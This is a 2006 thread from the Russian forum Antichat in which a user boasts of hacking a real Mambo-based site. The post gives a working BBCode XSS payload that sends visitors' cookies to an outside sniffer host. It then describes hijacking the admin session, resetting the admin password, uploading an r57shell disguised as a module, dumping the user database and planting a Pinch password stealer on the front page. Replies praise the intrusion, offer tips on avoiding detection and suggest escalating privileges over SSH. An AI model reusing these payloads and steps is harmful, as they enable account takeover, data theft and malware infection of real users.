ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Hey Mambo =) new_x55!
  #1  
Старый 22.08.2006, 14:37
Аватар для baz1k
baz1k
Познающий
Регистрация: 22.08.2006
Сообщений: 47
Провел на форуме:
132884

Репутация: 47
Отправить сообщение для baz1k с помощью ICQ
Post Hey Mambo =) new_x55!

## new_x55 на движке Mamba ##

Это моя первая статья и просвещенна она взлому сайта при помощи xss.
Прошу сильно не бить действительно это мой первый опыт!


Одним днем, когда делать было не чего я просматривал все знакомые мне форумы и сайты: оставлял сообщения, читал чужые и тд. Мне захотелось взломать один сайт, на котором стояла Mamba. По привычке запустил NMAP и полез на секлаб посмотреть нет ли уязвимостей у этого движка. Через минут десять NMAP показал список установленных сервисов, но нечего мне это не дало, так как все они были достаточно новые, так же в багтраках ничего не нашлось. Я думал уже плюнуть на сайт, но что то мне подсказывало, где то есть все таки брешь! Ну я и принялся проверять скрипты: подставлять заветную кавычку и это тоже мне не дало результатов. Потом я зашел в свои данные на сайте(я был зарегистрирован на этом сайте) и начал упорно вставлять банальную XSS и опять как на зло результатов не было!

Время было позднее и надо было что-то делать, тогда я принялся за форум и начал постить сообщения, в надежде на XSS-уязвимость и наконец свершилось: была найдена XSS-уязвимость:
PHP код:
[image=http://ya.ru/1.gif OnError="alert(document.cookie)"][/image] 
и вот меня приветствуют мои Куки! Я быстренько зарегал себе сниффер на http://s.netsec.ru . Изменил значение ядовитой XSS и она приняла вид:
PHP код:
[image=http://ya.ru/1.gif OnError="open('http://s.netsec.ru/sniffer.gif?'+document.cookie)"][/image] 
. И я стал ждать когда же админ зайдет на этот пост… Прошло минут двадцать как у меня уже появились Куки админа. Я быстренько полез в настройке моей любимой Oper'ы и поменял мои Куки на админские. И вот оно сообщение: Добро пожаловать admin! Итак я радостно полез в админку, но тут меня остановили и потребовали пароль! Недолго думая я залез в личные данные админа и поменял его пароль на 123! Теперь я мог свободно зайти в админку и начал быстро искать заветную строчку: залить шелл! Но такой к сожалению не оказалось, а жаль, но за то была: загрузить новый модуль! Притом файлы надо было запаковать в архив, не долго думаю я уже нажимал отправить! Вдруг выскочила ошибка: мол ну типа что-то тут у тебя не правильно!

Хм… Зашел на Яндекс и написал модули для Мамбы и скачал один из них. Оказывается он стоял из xml и php файлов. Я удалил php файл и за место него поставил всем известный r57shell и снова заархивировал. Вот он ответственный момент: я нажимаю кнопку Загрузить. Ага все ок наш модуль установлен и на него выведена ссылка, быстренько кликаю на не и вот перед о мной шелл. Итак я через него заливаю второй шелл, предварительно переименовав, и кинул в самую жопу, чтоб не палился. Удаляем установленный модуль с шеллом, чтобы не палиться и заходим в новый. Итак у нас Фрибзд новой ветки, да тут рута не получишь =(( Но не беда быстренько сделал дамп очень большой базы и кидаю себе на комп. В базе всего 3000 юзеров и что интересное в базе были найдены пароли от других сайтов!

Тут я встал пред выбором, а что собственно делать дальше установить проксю или … Я скопировал ссылку шелла и бросил к себе в файл Заначка. Но потом когда я увидел что у большенства народа шести знак это на меня навело идейку а не кинуть ли мне на сайт пинча! Итак я быстренько добавил код на главную страницу автоматического загрузчика файлов, написанного на Яве. И пошел спать… На следующий день, когда я зашел на свое мыло это просто было невероятно стока отчетов от пинча е-мое! Потихоньку стал их разбирать среди обыкновенных девяток лежали и шести знаки и не только пароли к фтп, к мылу и тд. Вот это выдался взомчик!

Последний раз редактировалось baz1k; 22.08.2006 в 14:59..
 
Ответить с цитированием

  #2  
Старый 23.08.2006, 01:43
Аватар для MINDFLY
MINDFLY
Banned
Регистрация: 18.06.2006
Сообщений: 38
Провел на форуме:
176960

Репутация: -10
По умолчанию

Взлом конечно нормальный ! А в статью можно было оформить и получше и посодержательней ! А так как для первого раза то вполне сойдет !
 
Ответить с цитированием

  #3  
Старый 23.08.2006, 10:42
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Цитата:
Сообщение от baz1k  
## new_x55 на движке Mamba ##


Недолго думая я залез в личные данные админа и поменял его пароль на 123!
...Итак я через него заливаю второй шелл, предварительно переименовав, и кинул в самую жопу, чтоб не палился.
Да уж, какое тут паливо... А обратно пароль ты само собой не вернул. Действительно, как админу догадаться... Советую никогда не менять содержимое индекса, вставляя туда всякие пинчи, если так палишься.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #4  
Старый 23.08.2006, 11:30
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

Статья хорошая!

p.s. а про предварительный просмотр забыл =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Последний раз редактировалось m0nzt3r; 23.08.2006 в 13:43..
 
Ответить с цитированием

  #5  
Старый 23.08.2006, 11:34
Аватар для baz1k
baz1k
Познающий
Регистрация: 22.08.2006
Сообщений: 47
Провел на форуме:
132884

Репутация: 47
Отправить сообщение для baz1k с помощью ICQ
По умолчанию

Там ретрив есть я ему пароль на мыло отослал! А пинч я зашифровал ну всмысле сжал его специальной прогой,что бы не палился! На Яве был старый эксплоит, так как улова было мало. Я воспользовался соц.инжен и это дало больше результата, ну типа Сотрите народ прикаляха вот ссылка на скачку! Там лежал пинч+флешка и значок я переделал под флешку и все!
 
Ответить с цитированием

  #6  
Старый 23.08.2006, 11:36
Аватар для baz1k
baz1k
Познающий
Регистрация: 22.08.2006
Сообщений: 47
Провел на форуме:
132884

Репутация: 47
Отправить сообщение для baz1k с помощью ICQ
По умолчанию

Не наю на локал долго ставить, не хотел а xss долго искал, я например писал а потом нажимал: Предворительный просмотр! И все...
 
Ответить с цитированием

  #7  
Старый 23.08.2006, 12:39
Аватар для Brahma
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию

Из всей "статьи" считаю лишь интересным - саму Xss. Далее - стандартная незаконченная схема. Можно попытаться получить Ssh (если он доступен на хосте) и поднять права.
 
Ответить с цитированием

  #8  
Старый 23.08.2006, 23:05
Аватар для baz1k
baz1k
Познающий
Регистрация: 22.08.2006
Сообщений: 47
Провел на форуме:
132884

Репутация: 47
Отправить сообщение для baz1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Brahma  
Можно попытаться получить Ssh (если он доступен на хосте) и поднять права.
Да есть там SSH! А поподробнее как это зделать можешь объяснить я в этом деле можно сказать еще навичоГГГ...
 
Ответить с цитированием

  #9  
Старый 24.08.2006, 01:37
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

Статья неплохая, главное что видно, что ты хочешь работать и помогать развитию проекта, респект!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ